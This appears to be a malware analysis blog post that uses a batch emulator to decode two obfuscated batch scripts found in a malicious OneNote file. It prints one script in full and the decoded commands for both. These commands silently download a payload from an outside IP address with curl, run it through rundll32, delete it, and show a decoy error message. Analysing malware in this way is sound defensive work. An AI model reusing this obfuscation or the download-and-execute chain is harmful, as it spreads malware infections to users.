This malicious OneNote document contains two obfuscated batch scripts and we’ll be using our commercial Simple Batch Emulator package to understand what they do.
SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13
We open the first batch script and decode its data to text with the action “Conversion -> Bytes to text” (Ctrl+R).
This is the batch script and as we can see it’s obfuscated.
GIFTS WITH DISCOUNTS >nul 2>&1 LIMITED OFFER @echo off echo Opening cloud attachment. Please, wait... set MTwQKSgpMHQL=l set kOMmbE=6 set ppriRNqimzzTSvKtXf=w set xjkkaUqzMsQfwuOvO=N set KSYAjImqTlEaqaUQk=j set WpncDVBcWdl=: set hXZtrthX=a set tzEroXSbsuwcjP=R set abwWhsgS=I set BfVscWaRFhKFCmEn=G set RFgBUQShCaK=t set YSnYOZtiQGsHWbQ=\ set TcEDTQuiRCwRnCZ=. set xClmPsTggJpylvV=e set vNQWiteQi=~ set gMymvy=P set "wzLrpmBHLFeDXp=^&" set OGlxoeCqS=* set ABCTXVZiIx=_ set xINjhSGoIiH=; set CJIMOVQWfQXQOdw=T set LEkBWAERtHbZHi=S set LmUcrlUYz=X set rBVcFPRbzVfPfSUyF=5 set FCWmviurmdolmnnUV=- set UMoZSPjFJvvChEk=K set QGYQnnwq=0 :: RPrSCzCUAATzV vqyBFMLBqtxnSlKMNs RdYRqenmbofWuRhYlp set xexBeMXmOc=Y set RerNvPMjfHYv=Z set SSDGYSluOaABFTa=n set Xvmanbnc=O set BqhoBjkpoCfz=m set kClPys=k set EVXBVtuZWFNZFffZx=b :: oNEHkdpApzcQojnR IkylOzKKzX set salnQA=p set IpPOCnYJoXfOpeA=v set xauJWmnNKt=2 set iWoZxOXHmAlQyPzt=c set CoXXaBVa=g set NRQHwqYiLqQu=4 :: CKWYSylZoes byhWiriMNX set lxegFxhbQBlOmLHpHo=9 set nYfHglKJWerCSSt=r set vTDYJe=C set WWBUqZ=A :: QmKggo Tstispm set hJOaPhawOaKZnvMvhu=U set tboSNACgeGqhwKHB=x set TbpVIiV=E set XRLcqeXQGEgkGA=8 set chKxzHcuSqepx=f set palzevPSCdzXI=F set xqyxFN=, set MAPaVaaVbcnCMF=' set cXJtyBgFnuLWwwuI=B set FFbJYLTBUoyJKRNMX=h set CZkQjeZGaJTFnMiPM=Q set pdSNFGNiQFiVMb=H set gIVLuIt=s set DlvLVqg=W :: JAbNuDdaMU FjiPpCzO LoheRy set NkuszVZKTz=y :: icuthSFXuaC dKsRVQ QmuhKSbMylnFCJoqvI :: CBIXovGcLEYeZ set dEDYlv=! set TFeXZUqf=# set OTiJUJwllhLt=i set lHvFElIZMHqJAvGu=/ set LMehDCaBboTb=d set OdLXhyBHVhmqSXw=%% set PWMguBlyRx=L set PgrmAuqfL= set sugcUnpjSvvQFACvv=7 set BVteXMgZfztowwMEiA=( set dGyJnqxqXvDT=J set ujWMrdCPoYEzMS=u set lycYegmHsTmEckqeDV=D set aRJyEodO=q set XTtRjfHr=3 set YXXTzNnOalV=z set HOlGVukZ=) set vTKpxAwRymHcXF=M set CqhVrRRZOybvn=o set rcDoYVocath=V :: wDWaEb NtljhLFEu hbfsdOvuLh set pYRUIxzT=1 :: VbfcBgnL ImjuXPqMOzmYQnGqm set sdKHQCulimAwBJR== if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit set "cjlpmAK=%BqhoBjkpoCfz%%gIVLuIt%%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%hXZtrthX%" set "znfBpu=%PgrmAuqfL%%KSYAjImqTlEaqaUQk%%hXZtrthX%%IpPOCnYJoXfOpeA%%hXZtrthX%" set "mOYkTDxIlAGJa=%gIVLuIt%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%%OTiJUJwllhLt%%salnQA%" set "jLhqMhfFdfqsHmIn=%RFgBUQShCaK%%WpncDVBcWdl%%hXZtrthX%%MTwQKSgpMHQL%%xClmPsTggJpylvV%" set "SfHNRwvBUb=%nYfHglKJWerCSSt%%RFgBUQShCaK%%BVteXMgZfztowwMEiA%%MAPaVaaVbcnCMF%%hJOaPhawOaKZnvMvhu%" set "ncTaJBUiFsgEMdQMo=%SSDGYSluOaABFTa%%hXZtrthX%%EVXBVtuZWFNZFffZx%%MTwQKSgpMHQL%%xClmPsTggJpylvV%" set "WzmDRG=%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%" set "FMOdiuUuMpBN=%CqhVrRRZOybvn%%SSDGYSluOaABFTa%%SSDGYSluOaABFTa%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%" set "oYFegi=%RFgBUQShCaK%%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%" set "EPDdkAFwIo=%RFgBUQShCaK%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%" set "xkLRLz=%MTwQKSgpMHQL%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%%LMehDCaBboTb%%dEDYlv%" set "SxfykmrgpDooGMX=%PgrmAuqfL%%vTDYJe%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%" set "ctDNSwOPEy=%kClPys%%PgrmAuqfL%%NkuszVZKTz%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%" set "RqozqythPRytu=%nYfHglKJWerCSSt%%PgrmAuqfL%%gIVLuIt%%hXZtrthX%%IpPOCnYJoXfOpeA%" set "dNaCZTSbGMVlOUMv=%xClmPsTggJpylvV%%LMehDCaBboTb%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%" set "yqGZymNyMRgpgYItUL=%xClmPsTggJpylvV%%LMehDCaBboTb%%xClmPsTggJpylvV%%SSDGYSluOaABFTa%%RFgBUQShCaK%" set "IUWWMPjPiDQggIwb=%OTiJUJwllhLt%%hXZtrthX%%MTwQKSgpMHQL%%gIVLuIt%%PgrmAuqfL%" set "hBhWgfli=%hXZtrthX%%SSDGYSluOaABFTa%%LMehDCaBboTb%%PgrmAuqfL%%nYfHglKJWerCSSt%" set "CWProZLsDmpnMO=%xClmPsTggJpylvV%%RFgBUQShCaK%%nYfHglKJWerCSSt%%NkuszVZKTz%%TcEDTQuiRCwRnCZ%" set "SVDRGSmTZXpy=%MAPaVaaVbcnCMF%%HOlGVukZ%%xINjhSGoIiH%%iWoZxOXHmAlQyPzt%%MTwQKSgpMHQL%" set "lUFINBtqfEeBi=%CqhVrRRZOybvn%%gIVLuIt%%xClmPsTggJpylvV%%BVteXMgZfztowwMEiA%%HOlGVukZ%" set "DLqlzxL=%xINjhSGoIiH%" set bKrHQnJgYLkLRdlPfp=%cjlpmAK%%znfBpu%%mOYkTDxIlAGJa%%jLhqMhfFdfqsHmIn%%SfHNRwvBUb%%ncTaJBUiFsgEMdQMo%%WzmDRG%%FMOdiuUuMpBN%%oYFegi%%EPDdkAFwIo%%xkLRLz%%SxfykmrgpDooGMX%%ctDNSwOPEy%%RqozqythPRytu%%dNaCZTSbGMVlOUMv%%yqGZymNyMRgpgYItUL%%IUWWMPjPiDQggIwb%%hBhWgfli%%CWProZLsDmpnMO%%SVDRGSmTZXpy%%lUFINBtqfEeBi%%DLqlzxL% if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit set "MEiEysS=%iWoZxOXHmAlQyPzt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%MTwQKSgpMHQL%%PgrmAuqfL%" set "hEEZxQ=%FCWmviurmdolmnnUV%%gIVLuIt%%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%" set "bSCPqurOBHv=%gIVLuIt%%gIVLuIt%%MTwQKSgpMHQL%%FCWmviurmdolmnnUV%%SSDGYSluOaABFTa%" set "ENVkYMiFcyLeD=%CqhVrRRZOybvn%%FCWmviurmdolmnnUV%%nYfHglKJWerCSSt%%xClmPsTggJpylvV%%IpPOCnYJoXfOpeA%" set "yhyKQvxJRAmfMmLrvQ=%CqhVrRRZOybvn%%kClPys%%xClmPsTggJpylvV%%PgrmAuqfL%%FCWmviurmdolmnnUV%" set "zVnWsFDbegYBO=%FCWmviurmdolmnnUV%%chKxzHcuSqepx%%hXZtrthX%%OTiJUJwllhLt%%MTwQKSgpMHQL%" set "xEsVgXu=%PgrmAuqfL%" set xIKbuUril=%MEiEysS%%hEEZxQ%%bSCPqurOBHv%%ENVkYMiFcyLeD%%yhyKQvxJRAmfMmLrvQ%%zVnWsFDbegYBO%%xEsVgXu% set "GyQPcYnVsENQBwBT=%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%" set "LQZZUjqMilSGG=%RFgBUQShCaK%%salnQA%%ujWMrdCPoYEzMS%%RFgBUQShCaK%%PgrmAuqfL%" set "jhqGuvWYATsIiWC=" set SFdNuqILphV=%GyQPcYnVsENQBwBT%%LQZZUjqMilSGG%%jhqGuvWYATsIiWC% set "ZYxjxzYjLeO=%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%RFgBUQShCaK%%salnQA%%WpncDVBcWdl%" set "hnigHp=%lHvFElIZMHqJAvGu%%lHvFElIZMHqJAvGu%%lxegFxhbQBlOmLHpHo%%pYRUIxzT%%TcEDTQuiRCwRnCZ%" set "vVMqMZEfrsRch=%xauJWmnNKt%%xauJWmnNKt%%XRLcqeXQGEgkGA%%TcEDTQuiRCwRnCZ%%pYRUIxzT%" set "DaDpbPEzhPdJGKKGgR=%QGYQnnwq%%TcEDTQuiRCwRnCZ%%pYRUIxzT%%XTtRjfHr%%NRQHwqYiLqQu%" set "DtYdKvm=%lHvFElIZMHqJAvGu%%gIVLuIt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%chKxzHcuSqepx%" set "BJNiXGg=%hXZtrthX%%iWoZxOXHmAlQyPzt%%xClmPsTggJpylvV%%lHvFElIZMHqJAvGu%%KSYAjImqTlEaqaUQk%" set "bMvXsjUVjZbwIIyde=%xjkkaUqzMsQfwuOvO%%kClPys%%EVXBVtuZWFNZFffZx%%kOMmbE%%lxegFxhbQBlOmLHpHo%" set "uClHPvlSNy=%kOMmbE%%YXXTzNnOalV%%tboSNACgeGqhwKHB%%WWBUqZ%%Xvmanbnc%" set "lNLOveFOJabtAtqdjy=%xexBeMXmOc%%ABCTXVZiIx%%ujWMrdCPoYEzMS%%pYRUIxzT%%IpPOCnYJoXfOpeA%" set "rZMPaKQnRSsL=%NkuszVZKTz%%aRJyEodO%%gIVLuIt%%CqhVrRRZOybvn%%QGYQnnwq%" set "FVFhwo=%XTtRjfHr%%salnQA%%vTKpxAwRymHcXF%%pYRUIxzT%%tzEroXSbsuwcjP%" set "kdZZTx=%ppriRNqimzzTSvKtXf%%cXJtyBgFnuLWwwuI%%kOMmbE%%OTiJUJwllhLt%%LmUcrlUYz%" set "eLhtMYXkdwHI=%kClPys%%lxegFxhbQBlOmLHpHo%%WWBUqZ%%vNQWiteQi%%vNQWiteQi%" set "BJWSwhpPmVXngzod=%lHvFElIZMHqJAvGu%%ABCTXVZiIx%%aRJyEodO%%MTwQKSgpMHQL%%LmUcrlUYz%" set "bEwVCCLtCoQNx=%chKxzHcuSqepx%%YXXTzNnOalV%%xjkkaUqzMsQfwuOvO%%KSYAjImqTlEaqaUQk%%UMoZSPjFJvvChEk%" set "hfpLYvBbEIbrisf=%gIVLuIt%%XTtRjfHr%%OTiJUJwllhLt%%gIVLuIt%%NRQHwqYiLqQu%" set "UpezsVhTToDIPyd=%RFgBUQShCaK%%ABCTXVZiIx%%QGYQnnwq%%IpPOCnYJoXfOpeA%%dGyJnqxqXvDT%" set "jPOromFtXDn=%abwWhsgS%%salnQA%%hXZtrthX%%CqhVrRRZOybvn%%BqhoBjkpoCfz%" set "oKQzltmDjTukIOpV=%RerNvPMjfHYv%%palzevPSCdzXI%%gIVLuIt%%lycYegmHsTmEckqeDV%%xauJWmnNKt%" set "GJSANIkzMYkizi=%CoXXaBVa%%EVXBVtuZWFNZFffZx%%rcDoYVocath%%FFbJYLTBUoyJKRNMX%%ppriRNqimzzTSvKtXf%" set "ltLlkobfEXFqnwkYdh=%vNQWiteQi%%vNQWiteQi%%lHvFElIZMHqJAvGu%" set jfMGIEDYGAgCHHJUgC=%ZYxjxzYjLeO%%hnigHp%%vVMqMZEfrsRch%%DaDpbPEzhPdJGKKGgR%%DtYdKvm%%BJNiXGg%%bMvXsjUVjZbwIIyde%%uClHPvlSNy%%lNLOveFOJabtAtqdjy%%rZMPaKQnRSsL%%FVFhwo%%kdZZTx%%eLhtMYXkdwHI%%BJWSwhpPmVXngzod%%bEwVCCLtCoQNx%%hfpLYvBbEIbrisf%%UpezsVhTToDIPyd%%jPOromFtXDn%%oKQzltmDjTukIOpV%%GJSANIkzMYkizi%%ltLlkobfEXFqnwkYdh% set "kjamXhOLYpt=%gIVLuIt%%CqhVrRRZOybvn%%LMehDCaBboTb%%SSDGYSluOaABFTa%%NkuszVZKTz%" set "SMVCxTQcVXzqCYLqR=%BqhoBjkpoCfz%%nYfHglKJWerCSSt%%salnQA%%TcEDTQuiRCwRnCZ%%KSYAjImqTlEaqaUQk%" set "ZFxCfsVnwlDI=%gIVLuIt%%KSYAjImqTlEaqaUQk%" set MNbiLHzZgYRjURP=%kjamXhOLYpt%%SMVCxTQcVXzqCYLqR%%ZFxCfsVnwlDI% set "vMhvNuNL=%nYfHglKJWerCSSt%%ujWMrdCPoYEzMS%%SSDGYSluOaABFTa%%LMehDCaBboTb%%MTwQKSgpMHQL%" set "aQNPBZPCpHS=%MTwQKSgpMHQL%%XTtRjfHr%%xauJWmnNKt%%PgrmAuqfL%" set OqroxhdAgfsysPZ=%vMhvNuNL%%aQNPBZPCpHS% set "IuipCtfGWFReSRk=%xqyxFN%%OTiJUJwllhLt%%SSDGYSluOaABFTa%%OTiJUJwllhLt%%RFgBUQShCaK%" set "rwYhYAS=" set FdtCBRu=%IuipCtfGWFReSRk%%rwYhYAS% set "ghStZE=%LMehDCaBboTb%%xClmPsTggJpylvV%%MTwQKSgpMHQL%%PgrmAuqfL%" set DTyxOFBzvxX=%ghStZE% %xIKbuUril%%jfMGIEDYGAgCHHJUgC%%SFdNuqILphV%%MNbiLHzZgYRjURP% %OqroxhdAgfsysPZ%%MNbiLHzZgYRjURP%%FdtCBRu% %DTyxOFBzvxX%%MNbiLHzZgYRjURP% %bKrHQnJgYLkLRdlPfp%
We run the batch emulator.
The emulator prints to the output view the result of the emulation.
This is the output:
echo: Opening cloud attachment. Please, wait... unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output sodnymrp.jsj unsupported command: rundll32 sodnymrp.jsj,init unsupported command: del sodnymrp.jsj unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();
As we can see, the script tried to download a file from a URL and then uses “rundll32” to execute the downloaded file. In the end as a decoy it warns the user that it couldn’t connect to the cloud to open the attachment.
We can repeat the same operations with the second script.
The second scripts executes the same operations. The only difference is the file name on disk of the downloaded file
echo: Opening cloud attachment. Please, wait... unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output fjxipv.jah unsupported command: rundll32 fjxipv.jah,init unsupported command: del fjxipv.jah unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();